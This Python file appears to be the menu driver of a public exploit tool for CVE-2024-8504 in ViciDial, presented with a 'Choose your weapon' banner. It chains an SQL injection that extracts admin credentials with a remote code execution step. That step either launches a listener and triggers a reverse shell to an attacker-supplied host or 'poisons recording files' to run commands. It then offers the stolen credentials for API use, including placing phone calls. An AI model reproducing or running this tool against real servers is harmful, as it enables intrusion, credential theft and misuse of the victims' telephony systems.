havokzero/ViciDial
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0ec7ccadff1e9764d4a65765d81dd27e846095c6
ViciDial/main.py
havok 0ec7ccadff Add files via upload
2024-09-22 13:17:47 -07:00

138 lines
6.0 KiB
Python
Raw Blame History

import colorama
from colorama import Fore, Style
import sys
from sqli import ExploitSQLI
from rce import ExploitRCE
from api import VicidialAPI
# Global variable to store the API instance once credentials are retrieved
api_instance = None
def print_banner():
banner = f"""
=============================================
| EXPLOIT CVE-2024-8504 |
| Discovered by KoreLogic |
| SQLi and RCE Exploit by HaVoK |
| Choose your weapon: SQLi or RCE |
=============================================
"""
print(Fore.CYAN + Style.BRIGHT + banner + Style.RESET_ALL)
def main_menu():
print(Fore.YELLOW + Style.BRIGHT + "Select an operation:")
print(Fore.GREEN + "[1] SQL Injection (SQLi)")
print(Fore.BLUE + "[2] Remote Code Execution (RCE)")
print(Fore.MAGENTA + "[3] Use Vicidial API (after credentials are retrieved)")
print(Fore.RED + "[0] Exit" + Style.RESET_ALL)
def handle_choice():
choice = input(Fore.MAGENTA + Style.BRIGHT + "Enter your choice: " + Style.RESET_ALL)
if choice == '1':
sqli()
elif choice == '2':
rce()
elif choice == '3':
if api_instance:
api_menu()
else:
print(Fore.RED + "No API instance available. Retrieve admin credentials first via SQLi or RCE." + Style.RESET_ALL)
elif choice == '0':
print(Fore.RED + "Exiting... Bye!" + Style.RESET_ALL)
sys.exit(0)
else:
print(Fore.RED + "Invalid choice. Try again." + Style.RESET_ALL)
def sqli():
global api_instance # To use the VicidialAPI instance globally
print(Fore.GREEN + "SQLi Selected. Proceeding with SQL Injection..." + Style.RESET_ALL)
# Initialize the ExploitSQLI class
exploit = ExploitSQLI()
# Run the SQL Injection exploit
exploit.run()
# If credentials were retrieved, save them for API usage
if exploit.username and exploit.password:
api_instance = VicidialAPI(exploit.TARGET_URL, exploit.username, exploit.password)
print(Fore.GREEN + f"Admin credentials retrieved!\nUsername: {exploit.username}\nPassword: {exploit.password}\nYou can now use the Vicidial API." + Style.RESET_ALL)
else:
print(Fore.RED + "Failed to retrieve admin credentials. SQLi unsuccessful." + Style.RESET_ALL)
def rce():
global api_instance
print(Fore.BLUE + "RCE Selected. Proceeding with Remote Code Execution..." + Style.RESET_ALL)
print(Fore.YELLOW + Style.BRIGHT + "\nSelect RCE Action:")
print(Fore.GREEN + "[1] Launch Listener and Execute Reverse Shell")
print(Fore.BLUE + "[2] Execute Command without Listener")
print(Fore.RED + "[0] Return to Main Menu" + Style.RESET_ALL)
rce_action = input(Fore.MAGENTA + Style.BRIGHT + "Enter your choice for RCE action: " + Style.RESET_ALL)
if rce_action == '1': # Launch listener and execute reverse shell
url = input(Fore.CYAN + Style.BRIGHT + "Enter target URL: " + Style.RESET_ALL)
whost = input(Fore.CYAN + Style.BRIGHT + "Enter webserver host: " + Style.RESET_ALL)
wport = input(Fore.CYAN + Style.BRIGHT + "Enter webserver port: " + Style.RESET_ALL)
lhost = input(Fore.CYAN + Style.BRIGHT + "Enter listener host: " + Style.RESET_ALL)
lport = input(Fore.CYAN + Style.BRIGHT + "Enter listener port: " + Style.RESET_ALL)
username = input(Fore.CYAN + Style.BRIGHT + "Enter admin username: " + Style.RESET_ALL)
password = input(Fore.CYAN + Style.BRIGHT + "Enter admin password: " + Style.RESET_ALL)
# Instantiate and run the ExploitRCE with listener setup
exploit = ExploitRCE(url, whost, wport, lhost, lport, username, password)
exploit.run()
# Store the credentials for API use
if username and password:
api_instance = VicidialAPI(url, username, password)
print(Fore.GREEN + "Admin credentials retrieved! You can now use the Vicidial API." + Style.RESET_ALL)
elif rce_action == '2': # Execute command without launching a listener
url = input(Fore.CYAN + Style.BRIGHT + "Enter target URL: " + Style.RESET_ALL)
whost = input(Fore.CYAN + Style.BRIGHT + "Enter webserver host: " + Style.RESET_ALL)
wport = input(Fore.CYAN + Style.BRIGHT + "Enter webserver port: " + Style.RESET_ALL)
username = input(Fore.CYAN + Style.BRIGHT + "Enter admin username: " + Style.RESET_ALL)
password = input(Fore.CYAN + Style.BRIGHT + "Enter admin password: " + Style.RESET_ALL)
# Instantiate ExploitRCE without listener
exploit = ExploitRCE(url, whost, wport, None, None, username, password)
exploit.poison_recording_files(exploit.build_requests_session()) # Execute without listener
print(Fore.GREEN + "Poisoned recording files without launching listener." + Style.RESET_ALL)
elif rce_action == '0': # Return to the main menu
return
else:
print(Fore.RED + "Invalid choice. Try again." + Style.RESET_ALL)
def api_menu():
print(Fore.YELLOW + Style.BRIGHT + "\nVicidial API Menu:")
print(Fore.GREEN + "[1] Get Server Info")
print(Fore.BLUE + "[2] List Campaigns")
print(Fore.CYAN + "[3] Make a Call")
print(Fore.RED + "[0] Return to Main Menu" + Style.RESET_ALL)
choice = input(Fore.MAGENTA + Style.BRIGHT + "Enter your choice: " + Style.RESET_ALL)
if choice == '1':
api_instance.get_server_info()
elif choice == '2':
api_instance.list_campaigns()
elif choice == '3':
phone_number = input(Fore.CYAN + Style.BRIGHT + "Enter phone number to call: " + Style.RESET_ALL)
campaign_id = input(Fore.CYAN + Style.BRIGHT + "Enter campaign ID: " + Style.RESET_ALL)
api_instance.make_call(phone_number, campaign_id)
elif choice == '0':
return
else:
print(Fore.RED + "Invalid choice. Try again." + Style.RESET_ALL)
if __name__ == "__main__":
print_banner()
while True:
main_menu()
handle_choice()
Reference in New Issue View Git Blame Copy Permalink